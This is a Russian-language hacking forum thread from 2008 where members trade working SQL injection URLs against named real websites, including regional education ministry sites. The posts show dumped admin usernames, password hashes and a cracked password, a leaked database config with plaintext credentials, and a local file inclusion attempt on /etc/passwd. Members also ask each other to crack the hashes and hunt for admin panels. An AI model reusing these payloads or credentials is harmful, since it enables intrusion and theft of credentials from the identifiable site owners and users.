Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.09.2008, 12:27
|
|
Новичок
Регистрация: 09.01.2007
Сообщений: 5
Провел на форуме:
10232
Репутация:
11
|
|
наверно не в тему...
низнаю полезно это или нет ну все же
http://www .gorenje.ru/
http://www .gorenje.ru/happynewyear/db.inc
Код:
<?php
/*
$sqlServer = 'localhost';
$sqlLogin = 'root';
$sqlPassword = 'a123dmin';
$sqlDatabase = 'jar_gorenje';
*/
$sqlServer = 'localhost';
$sqlDatabase = 'site';
$sqlLogin = 'site';
$sqlPassword = 'Vie4u';
$sqlHandle = mysql_connect ($sqlServer, $sqlLogin, $sqlPassword);
mysql_select_db ($sqlDatabase, $sqlHandle);
?>
зы его хостинг http://webhosting-say.hc. ru/
Код:
http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,name,4,5,6+from+srv14130_detki.shops--
ничего толком и не нашол(( |
|
|
04.09.2008, 14:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Еще 3 штучки
http://ukmoths.org.uk/show.php?id=-1+union+select+1,2,user(),4,5,version(),7,8,9,10,1 1,12,13,14,database(),16/*
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,user(),database()/*
http://www.hnsassociates.net/web/spheniscidae/news.php?id=-1+union+select+1,database(),version(),4,user(),6,7/*
P.S. и опять же не забываем про пробелы! |
|
|
|
05.09.2008, 01:04
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
гитаристам))
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,name,member_logi n_key),4,5,6,7+from+forum_akkords.ibf_members/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,login,pass),4,5, 6,7+from+admin/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,nick,pass),4,5,6 ,7+from+users/*
сонник:
http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,database(),3,4,5/*
http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,table_name,3,4,5+from+information _schema.tables/*
http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=CHAR(103,111,114 )/*
|
|
|
|
05.09.2008, 01:31
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
to KaJIaLL1HuKoB
Код:
http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,concat_ws(0x3a,name,activity,addr,phone,email,site,number),4,5,6+from+shops--
Код:
http://new.gazanalyzator.ru/index.php?id=-70/**/union/**/select/**/concat_ws(0x3a,user(),version(),database()),2,3,4--
gazanaly_gazanal@localhost:4.1.22-standard:gazanaly_data
Код:
http://www.rifpark.ru/enc/index.php?id=999+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10/*
4.1.22:rifpark@dix.hc.ru:wwwrifparkru_wwwrifparkru _wwwrifparkru
Министерство образования РК(Республика Карелия) =D
Код:
http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5/*
4.0.11a-gamma:kfro@localhost:minedu
Код:
http://www.radiolemma.ru/inner.php?t=progs&id=-22177+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*
4.1.22-community- max:lemma@inetsvr.media.local:lemma |
|
|
|
05.09.2008, 04:24
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
Министерство образования РК(Республика Карелия) =D
Код:
http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5/*
4.0.11a-gamma:kfro@localhost:minedu нашел 2 таблицы:
- news
- users
http://minedu.karelia.ru/devel/index.php?id=999+union+select+1,2,concat_ ws(0x3a,id,login,status),4, 5+from+users/*
Код:
1:root:rt
2:julia:wk
3:dmalinov:rt
4:Marina:rt
5:lataki:wk
6:kossuk:wk
7:morozov:wk
8:natalya:wk
9:gold:wk
Не могу никак прознать как поле с паролем называется 
логиниться тут: http://minedu.karelia.ru/login.php
====================================
Карельский Фонд Развития Образования:
http://kfro.karelia.ru/index.php?id=13+union+select+1, id,login+from+users/*
Таблица по строению такая же как и в министерстве. И лежит все удовольствие на одном серваке, тока в разных базах. Вопрос: Как называется поле с паролем?
====================================
КПМО в Республике Карелия:
есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит...
http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00
Че не так то?
Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62
Последний раз редактировалось -=Static=-; 05.09.2008 в 05:12..
|
|
|
|
05.09.2008, 10:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Еще 7 штучек!
http://www.graphicallies.com/news.php?ID=-1+union+select+1,user(),version(),4,database(),6,7 ,8/*
http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,user(),database(),5,6/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*
http://www.ecom-info.spb.ru/indicators/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),database(),version(),17,18,19,20,21,22,23,24,25, 26/*
http://www.interesulpublic.ro/print.php?id=-1+union+select+1,2,3,4,user(),6,7,database(),9,ver sion(),11,12,13,14,15,16,17,18/*
http://www.geo.pu.ru/modules/articles/print.php?id=-1+union+select+1,2,3,4,user(),version(),database() ,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://www.ecom-info.spb.ru/news/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),database(),version(),17,18,19,20,21,22,23,24,25, 26/*
|
|
|
|
05.09.2008, 10:17
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от -=Static=-
есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит...
http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00
Че не так то?
Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62
Ты обрати внимание на вот эту ошибку
Warning: main() [function.main]: Failed opening '../../../../../etc/passwd\0.html' for inclusion (include_path='.:/usr/share/pear') in /home/kpmo/www/file/page.php on line 26
приписывается расширение .html, ты конечно пытался его обрезать, но на сервере magic_quotes_gpc = On, т.е обрезать расширение не получиться.....
Ну а если обратить внимание на первую ошибку:
Warning: main(../../../../../etc/passwd\0.html) [function.main]: failed to create stream: No such file or directory in /home/kpmo/www/file/page.php on line 26
То видно, что сдесь удаленный инклуд, только опять же все портит расширение.....
|
|
|
|
05.09.2008, 13:25
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Сообщение от Twoster
Еще 7 штучек!
http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,user(),database(),5,6/*
Итак
все таблицы
Код:
-admins
-articles
-banners
-campaign
-categories
-config
-downloads
-feedback
-images
-pages
-prison_images
-prisoners
-prisons
-prs_images
-prs_letters
-quotes
-ticker
-timeline
Смотрим Admins
Код:
-admins
--username
--password
--email
--level
--last_login
На Username и password состовляем запрос
Код:
http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6+from+admins+limit+1,1/*
И получаем
Frodo:F8wsn.HKddfWfe0eJ.jEV/
SamG:Cn3At9msGsMmHeU.eMzUo0
Gandalf:Uh00xKufkwGB.HWIvgWTv0
чем разшифровывать эти хеши я х.з. поетому кто разшифрует плиз скиньте в личку пассы
Кстати пошарив по сайту нашел админку для составления рассылок
Код:
http://cageprisoners.com/mailman/admin
Последний раз редактировалось Мистерео; 05.09.2008 в 13:29..
|
|
|
|
05.09.2008, 15:18
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Сообщение от Twoster
http://www.graphicallies.com/news.php?ID=-1+union+select+1,user(),version(),4,database(),6,7 ,8/*
Итак розбираем )
версия 5 значит смотрим таблицы
Код:
http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
среди них находим нужную _adminusr и смотрим на колонки и находим интерисующие нас pass,username и составляем запрос на чтение
Код:
http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,concat_ws(0x3a,username,pass),4,5,6,7,8+from+_adminusr/*
Получаем результат
graphicadmin:10b8e9fc9fc6e8c5d42fb63f948934f6
Пробиваем хеш по базам и получаем
graphicadmin:topuser22
Потом сканим сайт на директории и файлы и находим кучи админок
http://www.graphicallies.com/admin/ - стоит basic аутидентификация логин и пасс не подходят
Нашел ище одну http://www.graphicallies.com/admincontrols/index.php - но опьять же логин и пасс невалидны
ище одна форма входа http://www.graphicallies.com:/hitech/userlogin.php - то самое логин и пасс невалидны
http://www.graphicallies.com/newtestsite/admin/ -админка в которой ниче нельзя сделать...
Где находится админка от сайта или где можна использовать логин\пароль х.з.
Последний раз редактировалось Мистерео; 05.09.2008 в 16:16..
|
|
|
|
05.09.2008, 20:04
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Сообщение от Twoster
http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*
Итак приступим.
Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом
Код:
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал
Andrey:2c44e4b135929e56f778fadc97077465
Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03 cfc
Kremniov:c4ca4238a0b923820dcc509a6f75849b
Начал проганять хеши через сервисы и только последний был взломан
Kremniov:1
попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
Код:
http://www.democracy.ru/admin/
но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...
А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)
P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
